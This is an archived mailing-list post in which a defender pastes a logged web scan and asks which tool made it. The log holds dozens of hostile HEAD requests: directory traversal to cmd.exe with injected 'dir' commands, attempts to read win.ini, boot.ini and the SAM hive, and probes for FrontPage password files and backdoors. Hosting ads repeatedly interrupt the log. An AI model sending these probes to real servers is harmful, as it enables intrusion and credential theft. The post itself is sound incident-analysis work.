Hosting Provided By

Does anyone recognize the scanner that causes this pattern ?

From: <dean(at)packethunter.com>
Date: Sun Apr 06 2003 - 15:24:23 EDT

('binary' encoding is not supported, stored as-is)

I recently logged a fairly extensive web scan and am trying to ID the tool responsible. Has anyone seen this particular pattern before ?

HEAD /.html/............*/config.sys HTTP/1.0\x0a\x0a
HEAD /.html/............./config.sys HTTP/1.0\x0a\x0a
HEAD /.html/............/autoexec.bat HTTP/1.0\x0a\x0a
HEAD /.jsp/WEB-INF/classes/Env.java HTTP/1.0\x0a\x0a
HEAD /.nsf/../winnt/win.ini HTTP/1.0\x0a\x0a
HEAD /../boot.ini HTTP/1.0\x0a\x0a
HEAD /../config.sys HTTP/1.0\x0a\x0a
HEAD /a.asp/..../..../winnt/repair/sam HTTP/1.0\x0a\x0a
HEAD /a.jsp//..//..//..//..//..//../winnt/win.ini HTTP/1.0\x0a\x0a
HEAD /cgi HTTP/1.0\x0a\x0a
HEAD /cgi/ HTTP/1.0\x0a\x0a
HEAD /cgibin HTTP/1.0\x0a\x0a
HEAD /cgi-bin HTTP/1.0\x0a\x0a
HEAD /cgibin/ HTTP/1.0\x0a\x0a
HEAD /cgi-bin/ HTTP/1.0\x0a\x0a
HEAD /cgi-bin/../../../../winnt/system32/cmd.exe HTTP/1.0\x0a\x0a
HEAD /cgi-bin/......../winnt/system32/cmd.exe HTTP/1.0\x0a\x0a
HEAD /cgi-bin/............winntsystem32cmd.exe?/c+dir+c: HTTP/1.0\x0a\x0a
HEAD /cgi-bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
HEAD /cgi-bin/sam._ HTTP/1.0\x0a\x0a
HEAD /cgi-win HTTP/1.0\x0a\x0a
HEAD /cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a
HEAD /doc HTTP/1.0\x0a\x0a
HEAD /iisadmin HTTP/1.0\x0a\x0a
HEAD /iisadmin/ HTTP/1.0\x0a\x0a
HEAD /iisamples/Sdk HTTP/1.0\x0a\x0a
HEAD /iissamples HTTP/1.0\x0a\x0a
HEAD /iissamples/Default HTTP/1.0\x0a\x0a
HEAD /script/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
HEAD /scripts HTTP/1.0\x0a\x0a
HEAD /scripts/ HTTP/1.0\x0a\x0a
HEAD /scripts/* HTTP/1.0\x0a\x0a
HEAD /scripts/../../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0

\x0a\x0a

HEAD /scripts/../../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
\x0a\x0a

HEAD /scripts/../../cmd.exe HTTP/1.0\x0a\x0a
HEAD /scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
HEAD /scripts/..../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a
HEAD /scripts/........../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
HEAD /scripts/........../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0

\x0a\x0a

HEAD /scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
HEAD /scripts/cmd.exe HTTP/1.0\x0a\x0a
HEAD /scripts/cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a
HEAD /scripts/iisadmin/default.htm HTTP/1.0\x0a\x0a
HEAD /scripts/iisadmin/samples HTTP/1.0\x0a\x0a
HEAD /scripts/iisadmin/tools HTTP/1.0\x0a\x0a
Do you need help? 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek
HEAD /scripts/perl HTTP/1.0\x0a\x0a
HEAD /scripts/samples HTTP/1.0\x0a\x0a
HEAD /scripts/tools HTTP/1.0\x0a\x0a
HEAD /search HTTP/1.0\x0a\x0a
HEAD /server-info HTTP/1.0\x0a\x0a
HEAD /server-status HTTP/1.0\x0a\x0a
HEAD /_AuthChangeUrl HTTP/1.0\x0a\x0a
HEAD /_AuthChangeUrl? HTTP/1.0\x0a\x0a
HEAD /_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
HEAD /_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0

\x0a\x0a

HEAD /_mem_bin/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /_mem_bin/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
\x0a\x0a

HEAD /_mem_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
HEAD /_private HTTP/1.0\x0a\x0a
HEAD /_vti_bin/_vti_adm HTTP/1.0\x0a\x0a
HEAD /_vti_bin/_vti_aut HTTP/1.0\x0a\x0a
HEAD /_vti_bin HTTP/1.0\x0a\x0a
HEAD /_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
HEAD /_vti_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0

\x0a\x0a

HEAD /_vti_bin/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /_vti_bin/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
\x0a\x0a

HEAD /_vti_bin/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
HEAD /cgi-bin/_vti_cnf HTTP/1.0\x0a\x0a
HEAD /_vti_inf.html HTTP/1.0\x0a\x0a
HEAD /_vti_log HTTP/1.0\x0a\x0a
HEAD /_vti_pvt HTTP/1.0\x0a\x0a
HEAD /_vti_pvt/ HTTP/1.0\x0a\x0a
HEAD /_vti_bin/shtml.dll/_vti_rpc HTTP/1.0\x0a\x0a
HEAD /_vti_txt HTTP/1.0\x0a\x0a
HEAD /abczxv.htw HTTP/1.0\x0a\x0a
HEAD /msadc/samples/adctest.asp HTTP/1.0\x0a\x0a
HEAD /scripts/Carello/add.exe HTTP/1.0\x0a\x0a
HEAD /cfdocs/exampleapp/publish/admin/addcontent.cfm HTTP/1.0\x0a\x0a
HEAD /_vti_adm/admin.dll HTTP/1.0\x0a\x0a
HEAD /scripts/admin.exe?/c+dir%20c: HTTP/1.0\x0a\x0a
HEAD /_vti_pvt/administrator.pwd HTTP/1.0\x0a\x0a
HEAD /_vti_pvt/administrators.pwd HTTP/1.0\x0a\x0a
HEAD /session/adminlogin HTTP/1.0\x0a\x0a
HEAD /admisapi/ HTTP/1.0\x0a\x0a
HEAD /iissamples/exair/search/advsearch.asp HTTP/1.0\x0a\x0a
HEAD /Album/?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%

2Fetc&dispsize=640&start=0 HTTP/1.0\x0a\x0a

HEAD /cgi-bin/alibaba.pl HTTP/1.0\x0a\x0a
HEAD /app.cfm HTTP/1.0\x0a\x0a
HEAD /cgi-dos/args.bat HTTP/1.0\x0a\x0a
HEAD /cgi-dos/args.cmd HTTP/1.0\x0a\x0a
HEAD /_vti_bin/_vti_aut/author.dll HTTP/1.0\x0a\x0a
HEAD /_vti_pvt/author.log HTTP/1.0\x0a\x0a
HEAD /_vti_pvt/authors.pwd HTTP/1.0\x0a\x0a
HEAD /autoexec.bat HTTP/1.0\x0a\x0a
HEAD /cgi-bin/bb-hostsvc.sh HTTP/1.0\x0a\x0a
HEAD /scripts/bbs.pl%3F+.htr HTTP/1.0\x0a\x0a
HEAD /bdir.htr HTTP/1.0\x0a\x0a
HEAD /cfdocs/examples/cvbeans/beaninfo.cfm HTTP/1.0\x0a\x0a
HEAD /bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Do you need more help? 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek

\x0a\x0a

HEAD /bin/scripts/../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
\x0a\x0a

HEAD /bin/scripts/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /bin/scripts/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
\x0a\x0a

HEAD /bin/scripts/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
HEAD /common/browser.inc HTTP/1.0\x0a\x0a
HEAD /scripts/c32web.exe HTTP/1.0\x0a\x0a
HEAD /carbo.dll HTTP/1.0\x0a\x0a
HEAD /scripts/Carello/Carello.dll HTTP/1.0\x0a\x0a
HEAD /scripts/cart32.exe HTTP/1.0\x0a\x0a
HEAD /scripts/cart32.exe/cart32clientlist HTTP/1.0\x0a\x0a
HEAD /catalog.nsf HTTP/1.0\x0a\x0a
HEAD /catalog.nsf/ HTTP/1.0\x0a\x0a
HEAD /AdvWorks/equipment/catalog_type.asp HTTP/1.0\x0a\x0a
HEAD /ASPSamp/AdvWorks/equipment/catalog_type.asp HTTP/1.0\x0a\x0a
HEAD /WebShop/logs/cc.txt HTTP/1.0\x0a\x0a
HEAD /WebShop/templates/cc.txt HTTP/1.0\x0a\x0a
HEAD /cgi-bin/ceilidh.exe HTTP/1.0\x0a\x0a
HEAD /cfcache.map HTTP/1.0\x0a\x0a
HEAD /cfdocs/cfmlsyntaxcheck.cfm HTTP/1.0\x0a\x0a
HEAD /cfusion/database/cfsnippets.mdb HTTP/1.0\x0a\x0a
HEAD /scripts/cgimail.exe HTTP/1.0\x0a\x0a
HEAD /scripts/CGImail.exe HTTP/1.0\x0a\x0a
HEAD /cgi-bin/cgitest.exe HTTP/1.0\x0a\x0a
HEAD /scripts/c32web.exe/ChangeAdminPassword HTTP/1.0\x0a\x0a
HEAD /cgi-bin/changepw.exe HTTP/1.0\x0a\x0a
HEAD /cgi-bin/c32web.exe/CheckError?error=53 HTTP/1.0\x0a\x0a
HEAD /config/checks.txt HTTP/1.0\x0a\x0a
HEAD /WebShop/logs/ck.log HTTP/1.0\x0a\x0a
HEAD /msadc/../../../../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0

\x0a\x0a

HEAD /msadc/..../..../..../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a HEAD /msadc/..../..../..../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0
\x0a\x0a

HEAD /msadc/......../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
HEAD /msadc/......../winnt/system32/cmd.exe?/c+dir%20c: HTTP/1.0\x0a\x0a
HEAD /msadc/.._../winnt/system32/cmd.exe?/c+dir HTTP/1.0\x0a\x0a
HEAD /msadc/msadcs.dll HTTP/1.0\x0a\x0a
HEAD /scripts/tools/newdsn.exe HTTP/1.0\x0a\x0a
HEAD /nofile.pl HTTP/1.0\x0a\x0a
HEAD /_vti_bin/shtml.dll/nosuch.htm HTTP/1.0\x0a\x0a
HEAD /scripts/no-such-file.pl HTTP/1.0\x0a\x0a
HEAD /cfdocs/expelval/openfile.cfm HTTP/1.0\x0a\x0a
HEAD /cfdocs/expeval/openfile.cfm HTTP/1.0\x0a\x0a
HEAD /Admin_files/order.log HTTP/1.0\x0a\x0a
HEAD /_private/orders.txt HTTP/1.0\x0a\x0a
HEAD /config/orders.txt HTTP/1.0\x0a\x0a
HEAD /wwwboard/passwd.txt HTTP/1.0\x0a\x0a
HEAD /pbserver/ HTTP/1.0\x0a\x0a
HEAD /pbserver/pbserver.dll HTTP/1.0\x0a\x0a
HEAD /cgi-bin/perl.exe HTTP/1.0\x0a\x0a
HEAD /cgi-bin/scripts/perl.exe HTTP/1.0\x0a\x0a
HEAD /cgi-win/perl.exe HTTP/1.0\x0a\x0a
HEAD /ows-bin/perlidlc.bat?&dir HTTP/1.0\x0a\x0a
HEAD /scripts/pfieffer.bat HTTP/1.0\x0a\x0a
HEAD /scripts/pfieffer.cmd HTTP/1.0\x0a\x0a
HEAD /cgi-bin/post32.exe HTTP/1.0\x0a\x0a
HEAD /scripts/postinfo.asp HTTP/1.0\x0a\x0a
HEAD /cgi-bin/ppdscgi.exe HTTP/1.0\x0a\x0a
HEAD /private HTTP/1.0\x0a\x0a
HEAD /process_bug.cgi HTTP/1.0\x0a\x0a
HEAD /iissamples/iissamples/query.asp HTTP/1.0\x0a\x0a
HEAD /iissamples/issamples/query.asp HTTP/1.0\x0a\x0a
HEAD /samples/search/queryhit.htm HTTP/1.0\x0a\x0a
HEAD /cfusion/cfapps/security/data/realm.mdb HTTP/1.0\x0a\x0a
HEAD /cfusion/cfapps/security/realm_.mdb HTTP/1.0\x0a\x0a
HEAD /scripts/emurl/RECMAN.dll HTTP/1.0\x0a\x0a
HEAD /cgi-bin/redirect.exe HTTP/1.0\x0a\x0a
HEAD /_private/register.txt HTTP/1.0\x0a\x0a
HEAD /_private/registrations.txt HTTP/1.0\x0a\x0a
HEAD /scripts/repost.asp HTTP/1.0\x0a\x0a
HEAD /bin/scripts/openvendor/gnete/RetrievePNBody.asp HTTP/1.0\x0a\x0a
HEAD /cgi-bin/rguest.exe HTTP/1.0\x0a\x0a
HEAD /scripts/rguest.exe HTTP/1.0\x0a\x0a
Can we help you? 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek
HEAD /robots.txt HTTP/1.0\x0a\x0a
HEAD /cfdocs/root.cfm HTTP/1.0\x0a\x0a
HEAD /scripts/root.exe?/c+dir%20c: HTTP/1.0\x0a\x0a
HEAD /sample.asp HTTP/1.0\x0a\x0a
HEAD /IISSAMPLES/ExAir/Search/search.asp HTTP/1.0\x0a\x0a
HEAD /search.dll HTTP/1.0\x0a\x0a
HEAD /cgi-bin/search97.vts HTTP/1.0\x0a\x0a
HEAD /search97.vts HTTP/1.0\x0a\x0a
HEAD /cfdocs/expeval/sendmail.cfm HTTP/1.0\x0a\x0a
HEAD /_vti_pvt/service.grp HTTP/1.0\x0a\x0a
HEAD /cfdocs/expelval/sendmail.cfm HTTP/1.0\x0a\x0a
HEAD /_vti_pvt/service.pwd HTTP/1.0\x0a\x0a
HEAD /servlet/SessionServlet HTTP/1.0\x0a\x0a
HEAD /cgi-bin/shop.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/shopper.cgi HTTP/1.0\x0a\x0a
HEAD /_private/shopping_cart.mdb HTTP/1.0\x0a\x0a
HEAD /cgi-bin/c32web.exe/ShowAdminDir HTTP/1.0\x0a\x0a
HEAD /iissamples/exair/howitworks/showcode.asp HTTP/1.0\x0a\x0a
HEAD /msadc/samples/selector/showcode.asp HTTP/1.0\x0a\x0a
HEAD /msadc/samples/selector/showcode.asp_2 HTTP/1.0\x0a\x0a
HEAD /showfile.asp HTTP/1.0\x0a\x0a
HEAD /_vti_bin/shtml.dll HTTP/1.0\x0a\x0a
HEAD /_vti_pvt/shtml.dll HTTP/1.0\x0a\x0a
HEAD /_vti_bin/shtml.exe HTTP/1.0\x0a\x0a
HEAD /_vti_pvt/shtml.exe HTTP/1.0\x0a\x0a
HEAD /ex/jsp/simple.jsp. HTTP/1.0\x0a\x0a
HEAD /adsamples/config/site.csc HTTP/1.0\x0a\x0a
HEAD /scripts/slxweb.dll HTTP/1.0\x0a\x0a
HEAD /smdata.dat HTTP/1.0\x0a\x0a
HEAD /cfusion/database/smpolicy.mdb HTTP/1.0\x0a\x0a
HEAD /cgi-bin/snorkerz.bat HTTP/1.0\x0a\x0a
HEAD /cgi-bin/snorkerz.cmd HTTP/1.0\x0a\x0a
HEAD /cfdocs/exampleapp/docs/sourcewindow.cfm HTTP/1.0\x0a\x0a
HEAD /srchadm HTTP/1.0\x0a\x0a
HEAD /cgi-bin/statsconfig.pl HTTP/1.0\x0a\x0a
HEAD /cgi-bin/test.bat HTTP/1.0\x0a\x0a
HEAD /cgi-bin/test.cgi HTTP/1.0\x0a\x0a
HEAD /today.nsf HTTP/1.0\x0a\x0a
HEAD /tree.dat HTTP/1.0\x0a\x0a
HEAD /cgi-bin/tst.bat HTTP/1.0\x0a\x0a
HEAD /admin/ HTTP/1.0\x0a\x0a
HEAD /administrator/ HTTP/1.0\x0a\x0a
HEAD /bbs/ HTTP/1.0\x0a\x0a
HEAD /bbs/admin/ HTTP/1.0\x0a\x0a
HEAD /bbs/admin/config/ HTTP/1.0\x0a\x0a
HEAD /bbs/data/ HTTP/1.0\x0a\x0a
HEAD /bbs/db/ HTTP/1.0\x0a\x0a
HEAD /bbs/include/ HTTP/1.0\x0a\x0a
HEAD /cache-stats/ HTTP/1.0\x0a\x0a
HEAD /card/ HTTP/1.0\x0a\x0a
HEAD /cgi-bin/admin/admin HTTP/1.0\x0a\x0a
HEAD /cgi-bin/Board/db/ HTTP/1.0\x0a\x0a
HEAD /cgi-bin/campas HTTP/1.0\x0a\x0a
HEAD /cgi-bin/counterfiglet/nc/f HTTP/1.0\x0a\x0a
HEAD /cgi-bin/jj HTTP/1.0\x0a\x0a
HEAD /cgi-bin/perl HTTP/1.0\x0a\x0a
Can't find what you're looking for? 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek
HEAD /cgi-bin/query HTTP/1.0\x0a\x0a
HEAD /cgi-bin/ssi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/wrap HTTP/1.0\x0a\x0a
HEAD /config/ HTTP/1.0\x0a\x0a
HEAD /customer/ HTTP/1.0\x0a\x0a
HEAD /data/ HTTP/1.0\x0a\x0a
HEAD /database/ HTTP/1.0\x0a\x0a
HEAD /databases/ HTTP/1.0\x0a\x0a
HEAD /db/ HTTP/1.0\x0a\x0a
HEAD /dbase/ HTTP/1.0\x0a\x0a
HEAD /deny/ HTTP/1.0\x0a\x0a
HEAD /devel/ HTTP/1.0\x0a\x0a
HEAD /docs/ HTTP/1.0\x0a\x0a
HEAD /document/ HTTP/1.0\x0a\x0a
HEAD /documents/ HTTP/1.0\x0a\x0a
HEAD /down/ HTTP/1.0\x0a\x0a
HEAD /download/ HTTP/1.0\x0a\x0a
HEAD /downloads/ HTTP/1.0\x0a\x0a
HEAD /example/ HTTP/1.0\x0a\x0a
HEAD /exec/show/config/cr HTTP/1.0\x0a\x0a
HEAD /file/ HTTP/1.0\x0a\x0a
HEAD /files/ HTTP/1.0\x0a\x0a
HEAD /forum/ HTTP/1.0\x0a\x0a
HEAD /ftp/ HTTP/1.0\x0a\x0a
HEAD /girl/ HTTP/1.0\x0a\x0a
HEAD /girls/ HTTP/1.0\x0a\x0a
HEAD /hire/ HTTP/1.0\x0a\x0a
HEAD /htdocs/ HTTP/1.0\x0a\x0a
HEAD /idea/ HTTP/1.0\x0a\x0a
HEAD /ideas/ HTTP/1.0\x0a\x0a
HEAD /image/ HTTP/1.0\x0a\x0a
HEAD /images/ HTTP/1.0\x0a\x0a
HEAD /img/ HTTP/1.0\x0a\x0a
HEAD /inc/ HTTP/1.0\x0a\x0a
HEAD /include/ HTTP/1.0\x0a\x0a
HEAD /include/inc/ HTTP/1.0\x0a\x0a
HEAD /includes/ HTTP/1.0\x0a\x0a
HEAD /incoming/ HTTP/1.0\x0a\x0a
HEAD /install/ HTTP/1.0\x0a\x0a
HEAD /lib/ HTTP/1.0\x0a\x0a
HEAD /library/ HTTP/1.0\x0a\x0a
HEAD /linux/ HTTP/1.0\x0a\x0a
HEAD /logging/ HTTP/1.0\x0a\x0a
HEAD /manual/ HTTP/1.0\x0a\x0a
HEAD /misc/ HTTP/1.0\x0a\x0a
HEAD /mp3/ HTTP/1.0\x0a\x0a
HEAD /mrtg/ HTTP/1.0\x0a\x0a
HEAD /msql/ HTTP/1.0\x0a\x0a
HEAD /mysql/ HTTP/1.0\x0a\x0a
HEAD /number/ HTTP/1.0\x0a\x0a
HEAD /pds/ HTTP/1.0\x0a\x0a
HEAD /perl HTTP/1.0\x0a\x0a
HEAD /phone/ HTTP/1.0\x0a\x0a
HEAD /php/ HTTP/1.0\x0a\x0a
HEAD /php3/ HTTP/1.0\x0a\x0a
HEAD /php4/ HTTP/1.0\x0a\x0a
HEAD /porno/ HTTP/1.0\x0a\x0a
Don't know where to look next? 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek
HEAD /ports/ HTTP/1.0\x0a\x0a
HEAD /private/ HTTP/1.0\x0a\x0a
HEAD /program/ HTTP/1.0\x0a\x0a
HEAD /programming/ HTTP/1.0\x0a\x0a
HEAD /programs/ HTTP/1.0\x0a\x0a
HEAD /public/ HTTP/1.0\x0a\x0a
HEAD /secret/ HTTP/1.0\x0a\x0a
HEAD /secrets/ HTTP/1.0\x0a\x0a
HEAD /server_stats/ HTTP/1.0\x0a\x0a
HEAD /server-info/ HTTP/1.0\x0a\x0a
HEAD /server-status/ HTTP/1.0\x0a\x0a
HEAD /set/ HTTP/1.0\x0a\x0a
HEAD /setting/ HTTP/1.0\x0a\x0a
HEAD /setup/ HTTP/1.0\x0a\x0a
HEAD /sex/ HTTP/1.0\x0a\x0a
HEAD /snmp/ HTTP/1.0\x0a\x0a
HEAD /source/ HTTP/1.0\x0a\x0a
HEAD /sources/ HTTP/1.0\x0a\x0a
HEAD /sql/ HTTP/1.0\x0a\x0a
HEAD /stat/ HTTP/1.0\x0a\x0a
HEAD /statistics/ HTTP/1.0\x0a\x0a
HEAD /Stats/ HTTP/1.0\x0a\x0a
HEAD /stats/ HTTP/1.0\x0a\x0a
HEAD /telephone/ HTTP/1.0\x0a\x0a
HEAD /temp/ HTTP/1.0\x0a\x0a
HEAD /temporary/ HTTP/1.0\x0a\x0a
HEAD /test/ HTTP/1.0\x0a\x0a
HEAD /tool/ HTTP/1.0\x0a\x0a
HEAD /tools/ HTTP/1.0\x0a\x0a
HEAD /usage/ HTTP/1.0\x0a\x0a
HEAD /weblog/ HTTP/1.0\x0a\x0a
HEAD /weblogs/ HTTP/1.0\x0a\x0a
HEAD /webstats/ HTTP/1.0\x0a\x0a
HEAD /work/ HTTP/1.0\x0a\x0a
HEAD /wstats/ HTTP/1.0\x0a\x0a
HEAD /wwwlog/ HTTP/1.0\x0a\x0a
HEAD /wwwstats/ HTTP/1.0\x0a\x0a
HEAD /acid/ HTTP/1.0\x0a\x0a
HEAD /acid/acid_main.php HTTP/1.0\x0a\x0a
HEAD /cgi-bin/ad.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/adcycle HTTP/1.0\x0a\x0a
HEAD /secret/secret/add-user.shmtl HTTP/1.0\x0a\x0a
HEAD /admin.php3?admin=anything HTTP/1.0\x0a\x0a
HEAD /adpassword.txt HTTP/1.0\x0a\x0a
HEAD /cgi-bin/aglimpse HTTP/1.0\x0a\x0a
HEAD /cgi-bin/allmanage.pl HTTP/1.0\x0a\x0a
HEAD /cgi-bin/allmanageup.pl HTTP/1.0\x0a\x0a
HEAD /cgi-bin/amlite/amadmin.pl HTTP/1.0\x0a\x0a
HEAD /cgi-bin/anacondaclip.pl?template=check HTTP/1.0\x0a\x0a
HEAD /cgi-bin/AnyForm2 HTTP/1.0\x0a\x0a
HEAD /cgi-bin/AT-admin.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/AT-generate.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/awl/auctionweaver.pl HTTP/1.0\x0a\x0a
HEAD /cgi-bin/auktion.pl HTTP/1.0\x0a\x0a
HEAD /banners.php?op=Change HTTP/1.0\x0a\x0a
HEAD /cgi-bin/bb-hist.sh HTTP/1.0\x0a\x0a
HEAD /cgi-bin/bbs_forum.cgi HTTP/1.0\x0a\x0a
HEAD /examples/applications/bboard/bboard_frames.html HTTP/1.0\x0a\x0a
Confused? Frustrated? 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek
HEAD /cgi-bin/bizdb1-search.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/bnbform.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/build.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/cached_feed.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/cachemgr.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/cal_make.pl HTTP/1.0\x0a\x0a
HEAD /cgi-bin/calender.pl HTTP/1.0\x0a\x0a
HEAD /cgi-bin/calender_admin.pl HTTP/1.0\x0a\x0a
HEAD /cgi-bin/s.cgi?q=a&tmpl=check HTTP/1.0\x0a\x0a
HEAD /cgi-bin-sdb HTTP/1.0\x0a\x0a
HEAD /cgi-bin/cgiforum.pl HTTP/1.0\x0a\x0a
HEAD /manage/cgi/cgiproc HTTP/1.0\x0a\x0a
HEAD /cgi-bin/cgiwrap HTTP/1.0\x0a\x0a
HEAD /secret/secret/change-passwd.shtml HTTP/1.0\x0a\x0a
HEAD /cgi-bin/changepw.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/classifieds.cgi HTTP/1.0\x0a\x0a
HEAD /caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd

HTTP/1.0\x0a\x0a
HEAD /caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server HTTP/1.0
\x0a\x0a

HEAD /caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini HTTP/1.0
\x0a\x0a

HEAD /caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC HTTP/1.0
\x0a\x0a

HEAD /caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000 HTTP/1.0
\x0a\x0a

HEAD /servlet/com.livesoftware.jrun.plugins.jsp.JSP HTTP/1.0\x0a\x0a
HEAD /servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter HTTP/1.0\x0a\x0a
HEAD /servlet/com.unify.ewave.servletexec.UploadServlet HTTP/1.0\x0a\x0a
HEAD /cgi-bin/commerce.cgi?page=check HTTP/1.0\x0a\x0a
HEAD /forum/common.php HTTP/1.0\x0a\x0a
HEAD /phorum/common.php HTTP/1.0\x0a\x0a
HEAD /cgi-bin/Count.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/CrazyWWWBoard.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/csvform.pl HTTP/1.0\x0a\x0a
HEAD /cgi-bin/htgrep HTTP/1.0\x0a\x0a
HEAD /cgi-bin/htmlscript HTTP/1.0\x0a\x0a
HEAD /cgi-bin/htsearch HTTP/1.0\x0a\x0a
HEAD /cgi-bin/htsearch?config=aaa HTTP/1.0\x0a\x0a
HEAD /index.html.bak HTTP/1.0\x0a\x0a
HEAD /index.html~ HTTP/1.0\x0a\x0a
HEAD /index.js%2570 HTTP/1.0\x0a\x0a
HEAD /index.php.bak HTTP/1.0\x0a\x0a
HEAD /index.php~ HTTP/1.0\x0a\x0a
HEAD /index.php3?vhosts[test]= HTTP/1.0\x0a\x0a
HEAD /adminlogin?RCpage=/sysadmin/index.stm HTTP/1.0\x0a\x0a
HEAD /cgi-bin/info2www HTTP/1.0\x0a\x0a
HEAD /cgi-bin/infosrch.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/lasso.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/ezshopper3/loadpage.cgi HTTP/1.0\x0a\x0a
HEAD /cgi-bin/loadpage.cgi HTTP/1.0\x0a\x0a
